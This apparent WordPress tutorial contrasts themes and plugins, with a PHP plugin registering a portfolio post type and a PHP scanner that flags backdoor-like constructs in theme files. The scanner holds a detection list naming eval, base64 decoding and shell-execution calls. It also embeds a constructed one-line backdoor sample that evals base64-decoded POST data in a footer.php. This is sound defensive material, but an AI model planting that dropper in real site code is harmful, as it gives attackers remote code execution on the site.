WordPress is provided as an open-source downloadable package, often called WordPress core. WordPress is extensible, meaning that this core can be extended by additional code. The easiest way to do this is to download and install plugins and themes.
There are other ways, such as editing the core code files directly, but these are not considered good practice. In general we want to leave the core code alone. Why? Themes and plugins are the two mechanisms provided to extend WordPress in “official ways”. This safeguards the core code and means that your changes don’t get overwritten during updates. It also keeps the core files identical to the published release, so a file-integrity check can tell a legitimate core file from a tampered one.
Does that mean that themes and plugins are always safe and work well? Not necessarily. Since they are just more PHP (and perhaps some CSS and JavaScript), a number of things could go wrong: they could be poorly written, they may conflict with one another or with WordPress core, or the developer could have malicious intent.
Themes vs plugins
So, if themes and plugins are both further packages of PHP, and maybe CSS and JavaScript, what is the difference between them? Well, the difference is somewhat artificial and is a matter of role and usage.
Philosophically speaking, and this is a basic tenet at WordPress.org, Plugins are for adding functionality and Themes are for controlling rendering, layout and visual presentation. In that sense, Themes, although they contain PHP, CSS and JS, play the same role in WordPress as CSS plays in the browser.
Practically, though, the lines blur. PHP is PHP, and you can put almost anything in a theme that you can put in a plugin (almost, because load order intervenes: plugins are loaded before the active theme’s functions.php, so a theme cannot hook anything that fires before it loads). In fact, many commercial themes are packed full of functionality in one ‘convenient’ bundle for users. Typically they carry marketing slogans such as “the only theme you’ll ever need”, which really means “once you start using it you are basically locked in and can’t switch to another theme.”
The test I use is this: if changing from theme Whizbang to theme Looksgood would result in a loss of functionality, then I won’t use theme Whizbang. I’ll look to a plugin to provide that functionality instead.
Common types of functionality that get slipped into themes are drag-and-drop page builders, photo sliders and galleries, and custom post types such as “portfolio”. Custom post types are the clearest case of lock-in: when the theme that registered the type is deactivated, the portfolio entries stay in the database but are no longer registered, so they disappear from both the admin screens and the front end until something registers the type again.
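Here is how that test plays out for a custom post type. This is an added example, not code from the original post or from any published theme or plugin: a small stand-alone plugin that registers the “portfolio” post type, so the content and its archive survive a switch from Whizbang to Looksgood. The plugin name, function names, labels and slug are assumptions chosen for the example.

```php
<?php
/**
 * Plugin Name: Portfolio Post Type (example)
 * Description: Registers the 'portfolio' custom post type from a plugin, not a theme.
 * Version:     0.1.0
 */
// Added example, not code from the original post or from any published theme.
// Assumed location: wp-content/plugins/portfolio-post-type/portfolio-post-type.php
// Nothing here depends on the active theme, so switching themes keeps the
// portfolio entries registered, editable and visible on the front end.

if (!defined('ABSPATH')) {
    exit; // Refuse to run if the file is requested directly instead of via WordPress.
}

/**
 * Register the post type. Runs on every request at 'init', which is where
 * WordPress expects post types to be declared.
 */
function portfolio_example_register_post_type()
{
    register_post_type('portfolio', [
        'labels' => [
            'name'          => 'Portfolio',
            'singular_name' => 'Portfolio Item',
            'add_new_item'  => 'Add New Portfolio Item',
        ],
        'public'       => true,                       // Visible on the front end and in admin.
        'has_archive'  => true,                       // Enables the /portfolio/ listing page.
        'rewrite'      => ['slug' => 'portfolio'],
        'menu_icon'    => 'dashicons-portfolio',
        'supports'     => ['title', 'editor', 'thumbnail', 'excerpt'],
        'show_in_rest' => true,                       // Block editor and REST API support.
    ]);
}
add_action('init', 'portfolio_example_register_post_type');

/**
 * Rewrite rules are cached, so rebuild them when the plugin is activated or
 * deactivated; otherwise /portfolio/ URLs return 404 until the cache is refreshed.
 */
function portfolio_example_activate()
{
    portfolio_example_register_post_type();
    flush_rewrite_rules();
}
register_activation_hook(__FILE__, 'portfolio_example_activate');
register_deactivation_hook(__FILE__, 'flush_rewrite_rules');
```

The division of roles from the previous section follows naturally: the plugin owns the data (the post type), and whichever theme is active owns the presentation by supplying archive-portfolio.php and single-portfolio.php templates. If the theme has no such templates, WordPress falls back to archive.php, single.php and finally index.php, so the content is still reachable, just less prettily laid out.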
What are themes
It is not possible to run WordPress without a theme; if you do nothing about themes, you will run one of the default themes shipped with WordPress core. These are typically named after the year in which the WordPress release they accompany was published.
So, for the version current when this was written (4.7.2), the theme is called Twenty Seventeen.
Let’s have a quick look at it and see what it contains.
Selection criteria
I dropped some harbingers of doom a few paragraphs back; how can we be sure themes are well coded and safe before we use them?
Well, it requires some detective work. I like to see a theme that has been in development for a while and is fairly popular. I look at the release notes and like to see a theme that regularly roots out bugs and keeps pace with WordPress core releases; a theme whose last update predates several core releases will not have received fixes for anything reported since, which is a warning sign. I read the support forums and look for two things: recurring problems and good developer response.
I also like to run two plugins on all sites: Wordfence Security, which is an all-round security plugin, and Exploit Scanner, which scans the site’s code looking for signs of known exploits. Both work from known patterns, so a clean scan is not proof that a theme is safe, and a flagged match still needs a human look; treat them as a first filter, not a substitute for the detective work above.
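To make concrete what “scanning site code for exploits” means, here is an added example in the spirit of Exploit Scanner; it is not that plugin’s code nor anything from the original post. It walks a theme directory and flags the constructs that turn up in backdoors far more often than in honest theme code. The pattern list, the labels and the two constructed sample files are assumptions made for the example; run it against a real theme by passing the directory path as the first argument.

```php
<?php
// theme-scan.php: added example, not the Exploit Scanner plugin's code.
// Usage: php theme-scan.php /path/to/wp-content/themes/whizbang
// With no argument it scans two constructed sample files embedded below.

declare(strict_types=1);

// Constructs that are rare in legitimate theme code but common in backdoors.
// Every hit is a lead for manual review, not proof of compromise.
const SUSPICIOUS_PATTERNS = [
    'eval of runtime-built code'       => '/\beval\s*\(/',
    'base64-decoded payload'           => '/\bbase64_decode\s*\(/',
    'compressed or rotated payload'    => '/\b(gzinflate|gzuncompress|str_rot13)\s*\(/',
    'shell command execution'          => '/\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(/',
    'function name taken from a variable' => '/\bcall_user_func(_array)?\s*\(\s*\$/',
    'include path taken from the request' => '/\b(include|require)(_once)?\s*\(?\s*\$_(GET|POST|REQUEST|COOKIE)/',
    'request data written to a file'   => '/\bfile_put_contents\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE)/',
    'hex-escaped string (obfuscation)' => '/(\\\\x[0-9a-fA-F]{2}){4,}/',
];

/**
 * Scan one file's source. Returns [line number, label, trimmed line] triples,
 * one per pattern that matched on that line.
 */
function scan_source(string $source): array
{
    $hits = [];
    foreach (explode("\n", $source) as $index => $line) {
        foreach (SUSPICIOUS_PATTERNS as $label => $regex) {
            if (preg_match($regex, $line) === 1) {
                $hits[] = [$index + 1, $label, trim($line)];
            }
        }
    }
    return $hits;
}

/**
 * Recursively scan every PHP file under $dir. Returns path => hits for files
 * that produced at least one hit.
 */
function scan_directory(string $dir): array
{
    $results  = [];
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $file) {
        if (!in_array(strtolower($file->getExtension()), ['php', 'phtml', 'inc'], true)) {
            continue;
        }
        $hits = scan_source((string) file_get_contents($file->getPathname()));
        if ($hits !== []) {
            $results[$file->getPathname()] = $hits;
        }
    }
    return $results;
}

// Constructed samples (not real theme files): an ordinary functions.php and a
// footer.php with the kind of one-line dropper that gets appended to theme files.
$samples = [
    'clean/functions.php'  => "<?php\nadd_action('wp_enqueue_scripts', function () {\n"
                            . "    wp_enqueue_style('whizbang', get_stylesheet_uri());\n});\n",
    'infected/footer.php'  => "<?php\n\$k = 'pa' . 'ss';\n"
                            . "if (isset(\$_POST[\$k])) { eval(base64_decode(\$_POST[\$k])); }\n"
                            . "?>\n<footer>...</footer>\n",
];

if ($argc > 1) {
    $results = scan_directory($argv[1]);
} else {
    $results = [];
    foreach ($samples as $name => $source) {
        $hits = scan_source($source);
        if ($hits !== []) {
            $results[$name] = $hits;
        }
    }
}

foreach ($results as $file => $hits) {
    foreach ($hits as [$lineNo, $label, $text]) {
        printf("%s:%d  %s\n    %s\n", $file, $lineNo, $label, $text);
    }
}
// Non-zero exit when anything was flagged, so the scan can gate a deployment.
exit($results === [] ? 0 : 1);
```

Run without arguments, the clean sample produces nothing and the infected sample is reported twice on its third line (once for eval, once for base64_decode). The pattern list is deliberately short and will produce false positives on legitimate code that shells out or decodes base64 for good reasons, which is exactly why each hit needs a reviewer rather than an automatic verdict.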
That’s the short version, but we are here to talk about child themes.